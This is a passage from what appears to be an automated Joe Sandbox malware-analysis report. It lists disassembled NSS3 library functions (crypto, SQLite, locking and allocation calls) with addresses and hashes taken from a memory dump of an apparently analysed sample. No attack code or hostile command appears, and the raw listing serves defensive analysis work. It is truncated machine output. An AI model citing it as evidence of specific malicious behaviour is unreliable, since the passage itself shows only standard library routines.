                                                                                                                                                                                                                            • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CB53D77,?,?,6CB54E1D), ref: 6CC51C8A
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CC51CB6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                            • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                                                                            • API String ID: 1840970956-3705377941
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CBCED6B
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CBCEDCE
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,6CBCB04F), ref: 6CBCEE46
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBCEECA
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CBCEEEA
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CBCEEFB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3768380896-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBCC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBCDAE2,?), ref: 6CBCC6C2
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CBCCD35
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                              • Part of subcall function 6CBB6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C3F
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CBCCD54
                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                              • Part of subcall function 6CBB7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61CCC,00000000,00000000,?,?), ref: 6CBB729F
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBCCD9B
                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CBCCE0B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CBCCE2C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CBCCE40
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaMark_Util.NSS3(?,6CBCCD93,?), ref: 6CBCCEEE
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBCCD93,?), ref: 6CBCCEFC
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBCCD93,?), ref: 6CBCCF0B
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBCCD93,?), ref: 6CBCCF1D
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF47
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF67
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CBCCD93,?,?,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF78
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3748922049-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF3D3F
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: PORT_NewArena_Util.NSS3(00000800,6CBF3CAF,?), ref: 6CB6BABF
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CBF3CAF,?), ref: 6CB6BAD5
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CBF3CAF,?), ref: 6CB6BB08
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CBF3CAF,?), ref: 6CB6BB1A
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CBF3CAF,?), ref: 6CB6BB3B
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF3CCB
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290AB
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290C9
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: EnterCriticalSection.KERNEL32 ref: 6CC290E5
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC29116
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: LeaveCriticalSection.KERNEL32 ref: 6CC2913F
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF3CE2
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBF3CF8
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF3D15
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF3D2E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4030862364-0
                                                                                                                                                                                                                            • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                            • Instruction ID: bca36fa57249b7609323bc53197de5fe9c0fb5f60d14a4e31683993860d298d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13112BB9A106506FE7205E65EC41B9BB3F4EF11308F504534E42A87B20F632F81EC663
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CBBFE08
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CBBFE1D
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CBBFE29
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CBBFE3D
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CBBFE62
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?), ref: 6CBBFE6F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 660648399-0
                                                                                                                                                                                                                            • Opcode ID: 01cb3a8fe20e45e875c424f3ac1baf28a0d09430838b5f7aa9b67864e643ef4b
                                                                                                                                                                                                                            • Instruction ID: c3bec5afbd5c1ad764d0fc4cf2a6bccae3f419378521507048c8f6a4f782b781
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01cb3a8fe20e45e875c424f3ac1baf28a0d09430838b5f7aa9b67864e643ef4b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE11CCBE6002856BEF018F55DC40A7B7398EF54299F148034F91DA7B12EB31D914C793
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Lock.NSS3 ref: 6CC6FD9E
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB51A48), ref: 6CC29BB3
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB51A48), ref: 6CC29BC8
                                                                                                                                                                                                                            • PR_WaitCondVar.NSS3(000000FF), ref: 6CC6FDB9
                                                                                                                                                                                                                              • Part of subcall function 6CB4A900: TlsGetValue.KERNEL32(00000000,?,6CCC14E4,?,6CAE4DD9), ref: 6CB4A90F
                                                                                                                                                                                                                              • Part of subcall function 6CB4A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CB4A94F
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CC6FDD4
                                                                                                                                                                                                                            • PR_Lock.NSS3 ref: 6CC6FDF2
                                                                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3 ref: 6CC6FE0D
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CC6FE23
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3365241057-0
                                                                                                                                                                                                                            • Opcode ID: 10fd19d43d4b74e5292e8bc056885ef088fa002a38238a3d7318a2fbb3b13741
                                                                                                                                                                                                                            • Instruction ID: 1dd6ba34e60ff09d3f101f3c4c507870761112468c170fa751020d13ae6c0665
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10fd19d43d4b74e5292e8bc056885ef088fa002a38238a3d7318a2fbb3b13741
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C0161B6A14241AFDF149F1AFD008557A31FB0226871543B4E82647FE1F722EE28C6C1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CBAFC55
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBAFCB2
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CBAFDB7
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CBAFDDE
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: TlsGetValue.KERNEL32(?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB8821
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: TlsGetValue.KERNEL32(?,?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB883D
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: EnterCriticalSection.KERNEL32(?,?,?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB8856
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CBB8887
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: PR_Unlock.NSS3(?,?,?,?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB8899
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                            • String ID: pkcs11:
                                                                                                                                                                                                                            • API String ID: 362709927-2446828420
                                                                                                                                                                                                                            • Opcode ID: 836cb00687d7eeb177d546c46e93d644cc82372716e4ca6d9712033d076715e1
                                                                                                                                                                                                                            • Instruction ID: a96e3e4bf41e79344b102f2b90d02201d4a6496a52a93d32e7d03af34cda755e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 836cb00687d7eeb177d546c46e93d644cc82372716e4ca6d9712033d076715e1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B51C3B1A081A1ABEB028FA99C40BEE7375EB41359F150025DDC46BB51EB31E906CB93
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CAEBE02
                                                                                                                                                                                                                              • Part of subcall function 6CC19C40: memcmp.VCRUNTIME140(?,00000000,6CAEC52B), ref: 6CC19D53
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEBE9F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • database corruption, xrefs: 6CAEBE93
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAEBE89
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CAEBE98
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 1135338897-598938438
                                                                                                                                                                                                                            • Opcode ID: b4b0c5966ece19b091aa9bff1963ec805b278abd11ec08845cee565267a9b70c
                                                                                                                                                                                                                            • Instruction ID: 3c897b155c9a0aa067929456bbecdc7baf383d7f6637197606cc66ddde0b3178
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4b0c5966ece19b091aa9bff1963ec805b278abd11ec08845cee565267a9b70c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF315931A043558BC300CF69E8D8AABBBB2AF4A314F0C8654EE841BB41D330EC85D7D4
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CB50BDE), ref: 6CB50DCB
                                                                                                                                                                                                                            • strrchr.VCRUNTIME140(00000000,0000005C,?,6CB50BDE), ref: 6CB50DEA
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CB50BDE), ref: 6CB50DFC
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CB50BDE), ref: 6CB50E32
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • %s incr => %d (find lib), xrefs: 6CB50E2D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                            • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                            • API String ID: 97259331-2309350800
                                                                                                                                                                                                                            • Opcode ID: 310f2df5f6d5405008a8bfe7186f6db2bdcf88f505071da12943d1d26dc4f9fd
                                                                                                                                                                                                                            • Instruction ID: 42f6d18707646c96a49b8fc1fe60fa57cf471119c57991d02877ef9d3a1f179f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 310f2df5f6d5405008a8bfe7186f6db2bdcf88f505071da12943d1d26dc4f9fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2012472B002549FE7209F24AC45E1773BCDB45A0DB54442EE909D3A41F762EC24C7E1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CAF9CF2
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CAF9D45
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CAF9D8B
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CAF9DDE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3168844106-0
                                                                                                                                                                                                                            • Opcode ID: 96334b95626e07bec93976bee438dcdb45ced7636db839f55cd5184289f430a6
                                                                                                                                                                                                                            • Instruction ID: bbd833aa708b3c7320627f23f9b6137cf2813a841ff2605273620c114d666395
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96334b95626e07bec93976bee438dcdb45ced7636db839f55cd5184289f430a6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FA1AE317042008FEB08EF75EA9877E3775AB86715F1C012DE42647A40DB3AE987DB92
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DE1B
                                                                                                                                                                                                                            • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CC0DE77
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2700453212-0
                                                                                                                                                                                                                            • Opcode ID: dbb2f79871749b062c6bbdd23778ac4501a1b9207887d3a2426f4daf218794e5
                                                                                                                                                                                                                            • Instruction ID: b2763ac0b4869f4cc715e8940faae0c7ea2725c69a93290c3995697e8f8a24b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbb2f79871749b062c6bbdd23778ac4501a1b9207887d3a2426f4daf218794e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8717771A00318CFDB10CF9AC5C069AB7B4FF89718F25816DD9696B702E772A942CF90
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB5EDFD
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000000), ref: 6CB5EE64
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CB5EECC
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB5EEEB
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB5EEF6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB61E0B
                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB61E24
